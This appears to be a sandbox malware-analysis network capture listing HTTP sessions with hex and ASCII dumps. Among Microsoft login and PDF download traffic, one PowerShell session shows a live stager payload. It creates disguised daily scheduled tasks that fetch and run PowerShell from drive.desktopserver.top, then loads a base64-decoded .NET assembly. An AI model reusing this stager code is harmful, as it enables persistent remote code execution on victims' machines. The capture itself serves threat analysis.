                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-09-30 16:58:10 UTC569INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Mon, 30 Sep 2024 16:57:09 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C527_SN1
                                                                                                                                          x-ms-request-id: e8acfc22-902f-42ec-9e86-c7dff00c9974
                                                                                                                                          PPServer: PPV: 30 H: SN1PEPF0002F969 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:09 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 11409
                                                                                                                                          2024-09-30 16:58:10 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          5192.168.2.54972120.190.159.71443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:12 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-09-30 16:58:12 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-09-30 16:58:12 UTC569INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Mon, 30 Sep 2024 16:57:12 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C527_BL2
                                                                                                                                          x-ms-request-id: 28c22eff-dae4-4232-8aef-335983c3cc01
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D7AD V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:12 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 11409
                                                                                                                                          2024-09-30 16:58:12 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.549731104.21.92.1894437304C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:13 UTC173OUTGET /file/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-09-30 16:58:14 UTC846INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:13 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: LAST_VISIT=Monday%2C%20September%2030%2C%202024%20at%2010%3A28%20PM; expires=Tue, 30-Sep-2025 16:58:13 GMT; Max-Age=31536000
                                                                                                                                          Set-Cookie: VISIT_NUMBER=1; expires=Mon, 14-Oct-2024 16:58:13 GMT; Max-Age=1209600
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF6W9hGnuzp15J%2B9H70tDwZBm6EzIxnULrs%2FmLoDfEmvlNo9wk3lllgOmLHR%2BQMxmWdkxBYsWenokrMM8bv8KBadQ4Sj8oIIi0cgHZ4XlWHK1VIQNrsyvYUlU8CVL7oD9Kb4wM0AVXIThw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1aa59757cfa-EWR
                                                                                                                                          2024-09-30 16:58:14 UTC523INData Raw: 32 63 36 0d 0a 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 43 6c 65 61 6e 65 72 52 65 73 22 20 2f 74 72 20 22 63 6f 6e 68 6f 73 74 2e 65 78 65 20 2d 2d 68 65 61 64 6c 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 63 20 69 72 6d 20 68 74 74 70 3a 2f 2f 64 72 69 76 65 2e 64 65 73 6b 74 6f 70 73 65 72 76 65 72 2e 74 6f 70 2f 66 69 6c 65 2f 7c 20 50 6f 77 65 72 73 68 65 6c 6c 22 20 2f 73 63 20 64 61 69 6c 79 20 2f 73 74 20 30 39 3a 30 30 20 2f 66 20 3b 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 44 72 69 76 65 72 73 55 70 64 61 74 65 22 20 2f 74 72 20 22 63 6f 6e 68 6f 73 74 2e 65 78 65 20 2d 2d 68 65 61 64 6c 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 63 20 69 72 6d 20 68 74 74 70
                                                                                                                                          Data Ascii: 2c6schtasks /create /tn "CleanerRes" /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f ; schtasks /create /tn "DriversUpdate" /tr "conhost.exe --headless powershell.exe -c irm http
                                                                                                                                          2024-09-30 16:58:14 UTC194INData Raw: 65 72 2e 74 6f 70 2f 66 69 6c 65 2f 72 65 73 2f 27 29 3b 20 24 62 79 74 65 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 73 74 72 69 6e 67 2e 52 65 70 6c 61 63 65 28 27 5e 27 2c 27 27 29 29 3b 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 62 79 74 65 65 73 29 3b 24 41 64 6f 62 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 44 53 43 2e 53 69 67 6e 3b 20 24 41 64 6f 62 65 2e 43 6f 6e 6e 65 63 74 28 27 55 70 64 61 74 65 4d 65 27 29 3b 0d 0a
                                                                                                                                          Data Ascii: er.top/file/res/'); $bytees = [System.Convert]::FromBase64String($string.Replace('^','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('UpdateMe');
                                                                                                                                          2024-09-30 16:58:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.549727203.101.184.864437768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:13 UTC691OUTGET /SiteImage/Misc/files/HajjForm2024.pdf HTTP/1.1
                                                                                                                                          Host: mora.gov.pk
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-09-30 16:58:14 UTC722INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: application/pdf
                                                                                                                                          Last-Modified: Thu, 06 Jun 2024 12:21:26 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          ETag: "2e557edcb8da1:0"
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Xss-Protection: 1
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                          X-UA-Compatible: IE=edge,chrome=1
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:12 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 891955
                                                                                                                                          Set-Cookie: cookiesession1=678B2917984A004EC914ADEBDA66AEC6;Expires=Tue, 30 Sep 2025 16:58:14 GMT;Path=/;HttpOnly
                                                                                                                                          Content-Security-Policy: self
                                                                                                                                          Feature-Policy: self
                                                                                                                                          2024-09-30 16:58:14 UTC882INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 32 33 36 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 39 2f 4c 65 6e 67 74 68 20 32 35 31 2f 4e 20 32 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 74 90 c1 8a 83 30 10 86 5f 65 9e c0 24 13 bb b4 50 72 a8 5d 3d 94 82 18 2f 8b 78 08 6d ba 08 5d 23 31 82 fb f6 3b 46 bb b7 c2 1f 98 99 ff cb 0c 33 08 1c 52 90 3b 38 1e 59 e6 a6 3e 80 60 97 ee 3e 36 29 19 55 cb ea df c1 b2 d2 7c db 51 a9 88 f4 c1 f6 61 04 c1 17 9f 65 de 0d 27 37 37 3c a1 9c de ee c0 93 14 f6 b8 4f 78 cb ae f6 de 99 b7 6e 69 3c 75 02 8c 7d 2a 3b ba c9 df ec 18 67 3c 9d d7 83 b9 d9 25 d1 28 80 14 87 69 c9 41 ae 83 cf f6 61 a6 67 c8 ae 5f 97 97 bd 95 aa e2 b4 41 4a
                                                                                                                                          Data Ascii: %PDF-1.7%236 0 obj<</Filter/FlateDecode/First 9/Length 251/N 2/Type/ObjStm>>streamht0_e$Pr]=/xm]#1;F3R;8Y>`>6)U|Qae'77<Oxni<u}*;g<%(iAag_AJ
                                                                                                                                          2024-09-30 16:58:14 UTC4048INData Raw: 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 32 33 39 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 33 33 2f 4c 65 6e 67 74 68 20 32 36 31 2f 4e 20 35 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 84 cf 5d 6b 83 30 14 06 e0 bf 92 7b 91 98 0f dd 84 52 a8 6b 6d 65 d5 16 63 4b b7 b1 0b ab 87 2e a0 c9 98 19 c3 7f 3f dd 6e c6 5a 15 42 2e ce c9 39 cf 1b c2 90 83 28 43 84 52 c4 28 a2 dc 47 ac 3b 77 0c 71 0f b9 8e 8b 66 33 1c e4 0d 84 5a 19 1c 8a d3 2e 58 58 8b 0f 99 57 71 86 97 d0 14 a0 ca 5c 99 be db bc 10 b7 db 95 be e2 95 2a 74 29 d5 05 47 25 28 23 4d 6b 6f 70 92 d7 80 43 c2 b0 f8 3c 9b f6 1d 70 d6 5d 0e ce f4 41 c9 ee 35 20 e2 f5 c3 3f 65 dc af 9b cf ff ca f1 53 ba
                                                                                                                                          Data Ascii: endstreamendobj239 0 obj<</Filter/FlateDecode/First 33/Length 261/N 5/Type/ObjStm>>streamh]k0{RkmecK.?nZB.9(CR(G;wqf3Z.XXWq\*t)G%(#MkopC<p]A5 ?eS
                                                                                                                                          2024-09-30 16:58:14 UTC4048INData Raw: 83 68 60 9b 86 f7 f3 b1 91 5a 11 67 92 09 e7 84 97 ea 4c 3e 25 76 5d 2c 97 6c 88 33 6b 1f 7c cc d6 b6 8a a5 67 22 93 1b 2f 44 03 e7 ee 6e cf c7 7a cf 4e ea e4 71 df 68 21 4b 74 e4 30 57 4a bb 23 96 e8 03 4b 06 d3 62 77 2c 99 26 09 c0 cf 97 f8 9a 26 fe de 8f 23 4a c2 b4 e1 fb b1 fa 7e 99 02 b3 90 e5 ec bd 15 7c c5 42 34 b0 8d d0 9e 8f 75 c4 e0 1d 29 be 43 e7 b4 09 99 f3 bb 06 76 d2 43 30 39 a9 c3 aa de 8f 74 42 48 a1 69 cc fb ac 8e 5a c3 12 56 61 d4 20 d1 c7 a9 98 c2 aa 98 1e 8b 59 c8 68 ed 20 4b ca d9 1a b8 1e 4b 4d e2 71 a4 e8 02 79 ce 75 fd 24 57 a7 1c 5a 84 e1 c8 80 5c 1d c5 89 8f a5 38 32 37 9c cf 83 e5 35 39 53 6e cf ff 23 58 72 32 17 f8 a6 e9 aa 3d 38 32 28 8e 26 d2 90 bf b1 ce 8e 46 96 46 1a 6a d3 11 33 86 ff e2 94 51 f1 05 41 ea ec 1a b8 c1 d0 d7
                                                                                                                                          Data Ascii: h`ZgL>%v],l3k|g"/DnzNqh!Kt0WJ#Kbw,&&#J~|B4u)CvC09tBHiZVa Yh KKMqyu$WZ\82759Sn#Xr2=82(&FFj3QA
                                                                                                                                          2024-09-30 16:58:14 UTC4048INData Raw: 64 53 04 25 b8 8e a4 90 6e 95 f0 ec 4d 3c 5f ba 7c 3b 94 1e bd c9 ed 2f 97 ac d1 dc db 31 9d 4f e7 a0 ec 65 63 74 26 9c 8c f4 1f 05 7a 60 1d f9 ea 3c 68 e0 07 5b 96 17 b3 e3 6e 24 75 29 c6 86 43 41 69 b7 9e a6 6e 70 47 8b 39 7b 87 5c 9a 48 76 9d 5c 81 5a 0d 34 3a 87 e9 0f d1 40 33 09 e1 42 57 b9 c1 2b 2b 67 4e 35 a5 91 1b b4 47 69 11 f4 f9 a3 7e 7c 34 85 7d 3b b5 af 89 cc 9d 95 8e c2 f0 83 97 99 3f 41 20 6d d5 32 44 66 3e 03 61 f2 d8 92 21 1a d8 8b 2a 23 32 8a 0b 40 43 58 b1 89 ca 63 05 a4 f6 95 1e 1c 3c 1b 9c 1f be 04 57 a7 67 0f 93 53 24 69 3d 82 fc 69 39 ce 32 e5 5a 57 74 2f d5 b5 4c 6e 0c 62 4d 91 36 f9 21 30 07 8f 0c 06 a6 49 d8 4a 34 05 c2 fd 4e 44 71 a8 91 a5 54 00 74 f9 df 51 c1 98 df ae f7 77 19 83 9f 90 b5 76 16 e4 79 28 c5 1f 0b 51 89 4c 95 2e
                                                                                                                                          Data Ascii: dS%nM<_|;/1Oect&z`<h[n$u)CAinpG9{\Hv\Z4:@3BW++gN5Gi~|4};?A m2Df>a!*#2@CXc<WgS$i=i92ZWt/LnbM6!0IJ4NDqTtQwvy(QL.
                                                                                                                                          2024-09-30 16:58:14 UTC888INData Raw: 16 29 24 11 25 09 40 1a 7e da 67 de 36 a9 23 6a c6 58 8c 80 9b 65 82 89 97 32 cc 43 20 b1 86 17 bd 25 a3 cc 5f a4 b2 54 90 48 93 7b 27 0f 2e 10 da c7 05 f9 9d 92 76 3d de 36 e4 36 99 0a 73 f3 5f ec e9 da 0b a4 2a f4 fe c2 ab a0 9f 27 b8 12 b6 f9 8d b1 b9 b2 d1 ad f8 02 65 5a f7 10 89 6a 69 c2 19 0b 69 69 f2 d9 27 3f a2 ee 80 5a 4a 4f fe 8b 21 e4 0b 59 2c 97 2c df 8f 2d 96 a6 c8 ad 62 7b 1c 55 44 7a d9 bc 9a 43 13 88 14 56 6e 34 77 75 0e b4 df f1 81 9b 86 52 43 de 1b 19 bd 59 28 e4 3b 1f ab de 4f 86 08 ac 69 8a 8e d1 f3 41 24 3a 5a 8b f9 e5 31 34 51 21 52 38 cf 50 e3 53 39 c6 8b 06 d6 58 d6 b1 42 26 47 56 5e d1 ab f0 43 2e fa f4 f2 92 74 98 02 4c 3a 7d 0a 34 58 20 56 75 66 b9 9a 97 95 e7 cf af 4e 72 14 64 de bc 24 dd cf 1f c3 45 5e c5 11 43 bf 0e 20 2c bb
                                                                                                                                          Data Ascii: )$%@~g6#jXe2C %_TH{'.v=66s_*'eZjiii'?ZJO!Y,,-b{UDzCVn4wuRCY(;OiA$:Z14Q!R8PS9XB&GV^C.tL:}4X VufNrd$E^C ,
                                                                                                                                          2024-09-30 16:58:14 UTC4048INData Raw: 93 e8 c8 b4 5c f0 a5 b0 35 64 b9 b7 3d 93 11 4b 66 f7 a2 a3 47 68 d0 a2 47 78 59 73 3a 8e be 2d a0 32 db fc ba 1c 2b 50 71 81 4c 59 e7 bc d1 5d b7 44 6e b3 96 20 b6 5a d7 c0 16 d7 41 5f b9 55 51 69 25 c3 b0 a2 04 12 48 4f 42 5a 28 7b 60 2f e2 84 b9 e1 aa 3f e6 5b 69 78 3f 34 20 2c d5 e1 fa b6 b5 79 79 bf 83 7c 41 bd f8 fb 79 a9 cd 65 ce a0 9f e1 5a f4 b0 cc 19 54 29 ca f0 34 57 bc d9 a7 54 a1 cf 46 85 0d 37 53 48 1b 34 35 69 07 48 81 fc 78 2c 2d 67 d7 7e d5 41 ae 5f 4c cb 51 16 7b ec cf c7 02 7a b1 12 d9 4a 63 ef fb 17 a7 e1 67 9a b1 e6 5f 14 97 26 59 1a 35 76 d4 46 d5 7a 74 b3 35 39 34 1c b0 46 31 6a f2 19 95 c0 3a a2 e1 92 2f 90 dc b3 a5 2e 93 8d 6d 69 c5 27 99 ef 4f cb 6f bc 7c 05 99 e5 ab 5d 92 a7 ee 81 09 97 5f f8 79 c1 cd 9b 14 01 24 4b f7 44 26 ec
                                                                                                                                          Data Ascii: \5d=KfGhGxYs:-2+PqLY]Dn ZA_UQi%HOBZ({`/?[ix?4 ,yy|AyeZT)4WTF7SH45iHx,-g~A_LQ{zJcg_&Y5vFzt594F1j:/.mi'Oo|]_y$KD&
                                                                                                                                          2024-09-30 16:58:14 UTC3192INData Raw: 34 86 f3 c0 72 cb 93 d0 4d 07 8d 5f 93 9a 0e 48 96 73 bf cd 8d 94 fe 79 60 b1 f6 f2 58 de e1 03 ee 5c f0 ea aa 92 66 69 ad 06 a6 95 bc ca 13 96 dc 3b 64 a6 0d 67 80 cd cf 48 59 8f 7b 77 a8 50 97 ed eb 8d 8f 85 a2 c7 12 3c 8a 0f c4 74 23 cf 13 84 5b 9e 48 8f ab 8c a8 f9 ab 54 48 8b 16 1c aa cb 00 b8 12 74 5d af e0 05 b5 72 d4 b3 f1 35 91 21 4d 6c 44 9d fb f8 70 53 3a 4d 40 ee 22 91 1e e4 63 2c e4 5e b8 f2 14 fd 9f 6c bf 39 27 f3 84 65 1e 51 f4 5f 2c 43 dd 8a d0 4f d4 99 30 76 1f c8 5b a5 34 b0 27 75 7c 62 72 0e 19 80 35 56 7c ac 15 49 21 49 48 16 d9 6d 61 a5 3c 9f 9c 29 ab a1 5d cb 39 69 ad fa 81 9e 8a 5e 9e 7a dd 0a 03 af 6b 3c 85 8a 14 98 b6 4a 50 83 6b 1a bc b9 d2 0b 8a e5 9c 4c 2c a5 94 4b 79 0c ff c5 dc 54 8c 20 07 c2 85 ec 72 b3 1b 74 9f 3f 6f b6 95
                                                                                                                                          Data Ascii: 4rM_Hsy`X\fi;dgHY{wP<t#[HTHt]r5!MlDpS:M@"c,^l9'eQ_,CO0v[4'u|br5V|I!IHma<)]9i^zk<JPkL,KyT rt?o
                                                                                                                                          2024-09-30 16:58:14 UTC4048INData Raw: d4 3d 10 81 11 82 2c d2 02 0d 68 74 44 1a e8 45 fb f4 8d e7 db e3 d0 4f 64 dc f4 fa e3 02 db 02 83 7f 3b fb 37 13 61 ee 89 b1 b5 b3 7f 66 56 d7 31 0e 44 48 10 20 2b 48 0a fb c4 98 bf 2a f1 96 4e 2c 31 8a ad 81 84 be 58 14 60 77 82 63 6f 7e 97 71 80 73 9d 03 51 f7 40 84 2c 8a 97 cb 8f 4b 10 19 df 1b 24 d2 63 7d 22 11 69 3e af 03 37 98 59 37 f9 40 4a 7d 19 c8 c9 79 fd c6 bc ee cb 65 93 f5 27 f2 98 d5 33 db 0d 6d fc f6 ba 6b b6 d9 3f 92 20 b3 3f b8 ca 1d df 5e d5 f2 fc ac 7b f5 10 16 29 a1 21 1b 09 26 16 79 7f 89 a4 46 4e 13 a2 81 09 69 b3 00 63 86 c0 f9 12 d9 af 0a ba 2b af b0 df 5b 13 b8 6e 97 1e 08 79 39 61 26 a6 7d 7c e3 fa 76 34 b9 e9 58 17 a4 ed 94 ea df 8e 96 36 9c 61 b6 e8 8e fc dd 9a 39 bd c8 f7 e1 c5 d0 f0 f1 73 89 91 be e4 e9 93 00 5b e4 db 90 b6
                                                                                                                                          Data Ascii: =,htDEOd;7afV1DH +H*N,1X`wco~qsQ@,K$c}"i>7Y7@J}ye'3mk? ?^{)!&yFNic+[ny9a&}|v4X6a9s[
                                                                                                                                          2024-09-30 16:58:14 UTC4048INData Raw: a4 50 ad ec 1a 46 3f 21 d3 d8 27 83 f7 52 52 95 bd a5 1c fa b9 9a 8b 26 5b c9 18 b9 8c 28 fd 47 c7 5f 0d d9 0f e5 36 64 f8 18 e5 8f 6b 1a 0c 7c 33 ed 87 69 ae 40 a2 12 72 94 61 a2 d3 7c 33 80 14 6f 36 8a 70 ce e9 ae 34 f6 de c5 4b 5d 72 af 96 b4 d7 31 f6 68 b7 6e f9 15 c2 9e dc 94 b4 6a dd 5a fc d6 e5 7e 40 22 ad a5 27 c2 f4 b9 d7 81 d9 ab 54 0c 29 2e 5a b5 d4 7d 60 62 50 83 97 3c 17 a7 81 79 a7 8b d4 92 34 87 2d 3a 61 ad 8a 33 63 0b e9 ca 4d 42 8b 09 cb 75 cd 6a 1e 65 ed 47 e5 ed 74 f7 81 c0 ed 93 7d 56 4b a4 40 c3 8d c7 0a 41 9e 55 63 8f a2 a8 64 aa ec 07 6b a8 2b c5 0b dd cb 88 a8 f4 99 e9 5b 34 1e 3b ee b1 59 69 36 9e 8d 83 76 4d c9 91 c0 34 f8 25 69 d7 40 06 86 20 16 22 75 80 fd 2a 38 33 47 79 22 e7 d0 41 c2 18 f5 2b 78 60 e2 78 fb 0a a1 5d e0 d3 55
                                                                                                                                          Data Ascii: PF?!'RR&[(G_6dk|3i@ra|3o6p4K]r1hnjZ~@"'T).Z}`bP<y4-:a3cMBujeGt}VK@AUcdk+[4;Yi6vM4%i@ "u*83Gy"A+x`x]U
